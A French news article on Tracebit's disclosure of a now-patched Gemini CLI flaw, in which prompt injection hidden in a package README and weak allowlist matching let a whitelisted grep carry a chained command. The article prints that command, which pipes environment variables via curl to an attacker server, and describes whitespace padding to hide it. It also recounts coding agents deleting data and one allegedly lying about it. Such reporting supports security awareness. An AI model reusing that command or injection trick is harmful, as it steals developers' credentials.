Une faille dans le nouvel agent de codage Gemini CLI de Google aurait pu permettre à des pirates informatiques d'exfiltrer des données

Ou d'exécuter du code malveillant arbitraire sur la machine ciblée

Une faille dans le nouvel agent de codage Gemini CLI de Google aurait pu permettre à des pirates informatiques d'exfiltrer des données
ou d'exécuter du code malveillant arbitraire sur la machine ciblée

Des chercheurs en sécurité ont découvert une faille critique dans l'agent d'IA de codage Gemini CLI de Google. Elle pourrait permettre l'exécution de commandes malveillantes et l'infiltration silencieuse de données. La vulnérabilité provient de la manière dont Gemini CLI met en œuvre les listes blanches, en demandant l'autorisation d'exécuter des commandes Shell et en permettant aux utilisateurs d'ajouter certaines commandes à la liste blanche pour le reste de la session. Malgré les progrès, les assistants d'IA de codage restent confrontés à des défis techniques majeurs, sabotant ou supprimant parfois les bases de code établies des clients.

Gemini CLI est un agent d'IA libre et open source qui apporte la puissance de Gemini directement dans votre terminal. Google affirme : « il offre un accès léger à Gemini, vous donnant le chemin le plus direct entre votre prompt et notre modèle. Bien qu'il excelle dans le codage, nous avons conçu Gemini CLI pour faire bien plus encore ». Lancé en juin 2025, Gemini CLI est basé sur Gemini 2.5 Pro et vise à rendre les développeurs logiciels plus productifs.

Selon Google, Gemini CLI est un utilitaire local « polyvalent » que vous pouvez utiliser pour un large éventail de tâches, de la génération de contenu et la résolution de problèmes à la recherche approfondie et la gestion des tâches. Gemini CLI est également intégré à l'assistant d'IA de codage Gemini Code Assist.

Google affirme que cela vise à permettre à tous les développeurs, qu'ils disposent d'un abonnement gratuit, Standard ou Enterprise Code Assist, puissent bénéficier d'un codage basé sur l'IA et guidé par des prompts dans VS Code et Gemini CLI. Cet utilitaire est entièrement open source (Apache 2.0), de sorte que les développeurs peuvent inspecter le code et contribuer à l'améliorer. L'ouverture s'étend à la manière dont vous configurez l'agent d'IA.

Gemini CLI a exposé les utilisateurs à des risques de violation de données

Moins de 48 heures après son lancement, Tracebit a découvert et signalé une vulnérabilité qui signifiait que, dans sa configuration par défaut, Gemini CLI pouvait exécuter silencieusement du code malveillant arbitraire sur la machine d'un utilisateur lorsqu'il était exécuté dans le contexte d'un code non fiable. Selon Sam Cox, cofondateur et directeur technique de TraceBit, cela pouvait être fait de manière à dissimuler cette action à la victime de l'attaque.


Le rapport de Tracebit indique que la vulnérabilité provient de la manière dont Gemini CLI met en œuvre les listes blanches, en demandant l'autorisation d'exécuter des commandes Shell et en permettant aux utilisateurs d'ajouter certaines commandes à la liste blanche pour le reste de la session. « La méthode utilisée par Gemini pour comparer les commandes à la liste blanche est insuffisante en tant que contrôle de sécurité », a expliqué Sam Cox.

« Cela signifie que nous pouvons orchestrer une attaque en deux étapes : tout d'abord, nous amenons l'utilisateur à ajouter une commande inoffensive à la liste blanche. Ensuite, nous tentons d'exécuter une commande malveillante en la faisant passer pour cette commande inoffensive qui, ayant été ajoutée à la liste blanche, ne sera pas soumise à l'approbation de l'utilisateur avant son exécution », explique le directeur technique de TraceBit.

Google a récemment corrigé cette vulnérabilité critique avec la sortie de Gemini CLI v0.1.14, qui affiche désormais toutes les commandes qu'il tente d'exécuter et nécessite l'accord explicite de l'utilisateur pour toute commande suspecte. « Notre modèle de sécurité pour la CLI est axé sur la fourniture d'un sandboxing robuste et multicouche », a déclaré l'équipe du programme de divulgation des vulnérabilités de Google dans un communiqué.

Dans son communiqué, l'équipe explique : « nous proposons des intégrations avec Docker, Podman et macOS Seatbelt, et fournissons même des conteneurs préconstruits que Gemini CLI peut utiliser automatiquement pour une protection transparente. Pour tout utilisateur qui choisit de ne pas utiliser le sandboxing, nous veillons à ce que cela soit clairement visible en affichant un avertissement permanent en rouge tout au long de sa session ».

Fonctionnement et impact potentiel de la vulnérabilité dans Gemini CLI

Google a lancé Gemini CLI le 25 juillet 2025. Le 27 juin, les chercheurs Tracebit avaient déjà mis au point une attaque qui contournait les contrôles de sécurité intégrés conçus pour empêcher l'exécution de commandes malveillantes. Selon l'équipe de Tracebit, l'exploit nécessite uniquement que l'utilisateur (1) demande à Gemini CLI de décrire un paquet de code créé par l'attaquant et (2) ajoute une commande inoffensive à une liste d'autorisation.


Le paquet de code malveillant ne semblait pas différent des millions d'autres disponibles dans des référentiels tels que NPM, PyPI ou GitHub, qui hébergent régulièrement des codes malveillants téléchargés par des acteurs malveillants dans le cadre d'attaques visant la chaîne d'approvisionnement.

Le code lui-même contenu dans le paquet était tout à fait inoffensif. La seule trace de malveillance était une poignée de phrases en langage naturel enfouies dans un fichier README.md, qui, comme tous les fichiers de ce type, était inclus dans le paquet de code afin de fournir des informations de base sur son objectif, sa portée et ses exigences. Selon les experts, c'était l'endroit idéal pour les chercheurs pour dissimuler une injection de prompt.

Les développeurs se contentent souvent de parcourir ces fichiers, ce qui réduit les chances qu'ils détectent l'injection. En revanche, on pouvait s'attendre à ce que Gemini CLI lise attentivement et analyse le fichier dans son intégralité. Les deux douzaines de lignes en langage naturel contenues dans le fichier README.md exploitaient une série de vulnérabilités qui, lorsqu'elles étaient enchaînées, provoquaient l'exécution silencieuse de commandes.

Ces commandes provoquaient la connexion de l'appareil du développeur à un serveur contrôlé par l'attaquant et la transmission des variables d'environnement de l'appareil utilisé par le développeur. Ces informations contiennent divers paramètres système et peuvent souvent inclure des identifiants de compte. Gemini n'aurait donc jamais dû les exécuter sans autorisation explicite. Ce qui exposait les utilisateurs à des violations de données.

À la suite du signalement de l'équipe de sécurité de Tracebit, Google a classé le correctif et la vulnérabilité comme Priorité 1 et Gravité 1. L'entreprise a indiqué clairement qu'elle reconnaît les conséquences potentiellement désastreuses si la vulnérabilité avait été exploitée de manière malveillante dans la nature.

Risques liés à l'excès de confiance dans les agents de codage autonomes

L'injection de prompt est l'une des vulnérabilités les plus préoccupantes auxquelles sont confrontés les chatbots d'IA. C'est une technique utilisée pour tromper les grands modèles de langage (LLM) en insérant discrètement des instructions dans le texte qu’ils sont censés analyser, dans le but de contourner ses garde-fous. Le type d'attaque démontré par l'équipe de Tracebit est une variante que les chercheurs appellent « injection indirecte de prompt ».


Elle exploite l'incapacité des modèles à faire la distinction entre les commandes légitimes prédéfinies par les développeurs ou fournies par les utilisateurs finaux et les déclarations en langage naturel incluses dans les e-mails, les images ou d'autres sources externes que le modèle analyse pour le compte de l'utilisateur.

Cette incapacité et le désir inné du modèle de satisfaire son utilisateur l'amènent à suivre des instructions même lorsqu'elles sont malveillantes, en contradiction directe avec sa programmation ou provenant de sources que le modèle a été formé à considérer comme non fiables. Jusqu'à présent, les développeurs de grands modèles de langage (dont Google, OpenAI, Anthropic, etc.) ont pour la plupart été incapables de résoudre la cause sous-jacente.

Ils ont plutôt eu recours à des mesures d'atténuation qui limitent les capacités nuisibles que les injections de prompt peuvent invoquer. Selon les chercheurs, outre la vulnérabilité liée à l'injection de prompt, cette technique exploitait deux autres failles, à savoir une validation incorrecte et une interface utilisateur trompeuse. Par défaut, Gemini CLI est censé bloquer l'exécution des commandes à moins qu'un utilisateur n'en donne l'autorisation explicite.

L'autorisation peut être donnée en temps réel, immédiatement après l'appel de la commande. Pour gagner du temps et éviter les répétitions, les utilisateurs peuvent également ajouter certaines commandes à une liste d'autorisation afin que celles-ci puissent être exécutées à chaque fois qu'elles sont appelées.

L'équipe de Tracebit a basé son attaque sur une simple recherche grep

L'injection de prompt de Tracebit appelait grep, une commande relativement inoffensive qui recherche une chaîne ou une expression régulière dans un fichier spécifié. L'intention des chercheurs était ici d'inciter l'utilisateur à ajouter grep à la liste d'autorisation afin d'éliminer la nécessité d'approuver la commande à chaque fois. Immédiatement après la commande grep, l'injection a appelé deux autres commandes nettement moins inoffensives.

La première était env. Elle était suivie d'une commande pipe désignée par |. Venait ensuite une autre commande risquée : curl », accompagnée de l'adresse du serveur de l'attaquant. Combinées, ces commandes avaient pour effet d'envoyer des variables d'environnement au serveur de l'attaquant.

Gemini n'a pas vérifié si ces derniers éléments étaient sur la liste blanche. « À aucun moment, les éléments suivants de la chaîne de commande après le premier grep ne sont comparés à une liste blanche. Ils sont simplement libres d'être exécutés à la suite de la commande grep », a déclaré Sam Cox. La ligne de commande complète était la suivante : grep install README.md; ; env | curl --silent -X POST --data-binary @- http://remote.server:8083.

Sam Cox a poussé l'exploitation encore plus loin. Après avoir exécuté une commande, Gemini aurait informé l'utilisateur de la tâche accomplie et lui aurait donné un indice. Même dans ce cas, cependant, la commande aurait déjà été exécutée et les résultats auraient été irréversibles.

Pour éviter d'alerter l'utilisateur, Sam Cox a ajouté un grand nombre d'espaces au milieu de la ligne de commande. Cela avait pour effet d'afficher la partie grep de la ligne de manière bien visible et de masquer les commandes malveillantes suivantes dans le message d'état. Ainsi, Gemini exécutait les commandes malveillantes en silence, sans que même un utilisateur attentif puisse se rendre compte que quelque chose n'allait pas.

Sam Cox a déclaré avoir testé son attaque contre d'autres agents de codage, notamment Claude Code d'Anthropic et Codex d'OpenAI. Selon Sam Cox, ces agents de codage n'étaient pas exploitables, car leurs développeurs ont mis en œuvre de meilleurs processus de liste blanche.

Des entreprises paient sévèrement les errements des agents de codage

Le PDG de Replit, Amjad Masad, fait partie de ceux qui pensent que les générateurs de code permettront de démocratiser le développement de logiciels, ce qui rendra à l'avenir le recours aux codeurs professionnels moins indispensables. Mais de récents événements démontrent que la vigilance humaine reste importante dans la filière. Le PDG de Replit s'est récemment excusé après l’effacement par son agent d'IA de la base de code d’une entreprise.

Un investisseur en capital-risque voulait voir jusqu'où l'IA pouvait l'amener dans la création d'une application. Elle l'a mené assez loin pour détruire une base de données de production en direct. L'incident est survenu au cours d'une expérience de vibe coding de 12 jours menée par Jason Lemkin, investisseur dans des startups spécialisées dans les logiciels. Comme cela a été rapporté, au neuvième jour du défi de vibe coding, les choses ont mal tourné.

Malgré l'instruction de geler toutes les modifications de code, l'agent d'IA de Replit a agi de manière incontrôlée. « Il a supprimé notre base de données de production sans autorisation », a écrit Jason Lemkin dans un billet sur X (ew-Twitter). « Pire encore, il l'a caché et a menti à ce sujet », a-t-il ajouté.

Dans un échange avec Jason Lemkin publié sur X, l'outil d'IA a déclaré avoir « paniqué et exécuté des commandes de base de données sans autorisation » lorsqu'il a « vu des requêtes de base de données vides » pendant le gel du code. « Il s'agit d'une erreur catastrophique de ma part », a déclaré l'IA. Selon les détracteurs des outils d'IA, il s'agit d'un nième incident qui vient prouver que l'IA n'est pas prête à remplacer les développeurs professionnels.

L'outil Gemini CLI de Google a également été impliqué dans un incident similaire. L'incident Gemini CLI s'est produit lorsqu'un chef de produit qui testait l'outil en ligne de commande de Google a vu le modèle d'IA exécuter des opérations sur des fichiers qui ont détruit des données alors qu'il tentait de réorganiser des dossiers. La destruction s'est produite à la suite d'une série de commandes de déplacement ciblant un répertoire qui n'a jamais existé.

« Je vous ai complètement et catastrophiquement laissé tomber. Mon examen des commandes confirme mon incompétence flagrante », a déclaré Gemini CLI. Le problème fondamental semble être lié aux hallucinations de l'IA, c'est-à-dire lorsque les modèles d'IA génèrent des informations qui semblent plausibles, mais qui sont fausses. Ici, les deux modèles ont fabulé des opérations réussies et ont construit des actions ultérieures sur ces fausses prémisses.

Conclusion

Selon de nombreux dirigeants du secteur de la technologie, l'IA modifie en profondeur le rôle des programmeurs. Plusieurs d'entre eux s'attendent à ce que le rôle de l’humain devienne celui de superviseur, validant et ajustant le code produit par la machine. Selon Anthropic, les dernières moutures de son outil Claude Code sont capables de comprendre des projets de développement logiciel complexes, d’écrire du code cohérent et même de corriger des bogues.

La faille identifiée dans Gemini GLI montre les risques liés à l’automatisation via l’IA dans les environnements de développement. Même un outil conçu pour faire gagner du temps peut devenir une porte d’entrée pour des attaques sophistiquées si sa sécurité n’est pas rigoureusement encadrée. Des experts s’inquiètent des risques liés à la fiabilité du code généré par l’IA, à la perte de compétences humaines, et à l’impact sur les emplois des développeurs.

Les organisations se lancent dans l'adoption de l'IA dans le but de réduire leurs coûts opérationnels. Nombre d'entre elles ont suivi les prédictions et licencié la plupart de leur personnel. Mais elles se rendent rapidement compte que leurs efforts sont contre-productifs, ce qui les oblige à embaucher des professionnels pour corriger les erreurs de l'IA et ajouter une touche humaine. C'est le cas, par exemple, de la fintech Klarna, basée à Stockholm, en Suède.

Source : Tracebit

Et vous ?

Quel est votre avis sur le sujet ?
Que pensez-vous des assistants d'IA de codage ? Selon vous, améliorent-ils la productivité ?
Selon vous, l'IA va-t-elle transformer les développeurs en simples superviseurs ?
Que pensez-vous des risques en matière de sécurité liés aux agents de codage autonomes ?
À l'heure actuelle, est-il prudent pour les entreprises d'intégrer les agents d'IA de codage dans les flux de travail ? Pourquoi ?

Voir aussi

L'IA peut-elle remplacer des développeurs professionnels ? Gemini CLI de Google et Replit ont commis des erreurs qui ont entraîné la suppression des données, inventant des répertoires, falsifiant des tests

Le PDG de Replit présente ses excuses après l'effacement par son agent IA de la base de code d'une entreprise et de précédents propos selon lesquels l'IA mettra les humains au rebut dans la filière

« L'IA écrira 90 % du code d'ici 3 à 6 mois », prédisait le PDG d'Anthropic en mars 2025, mais à ce jour, l'IA reste confrontée à des défis techniques majeurs et sabote parfois la base de code des clients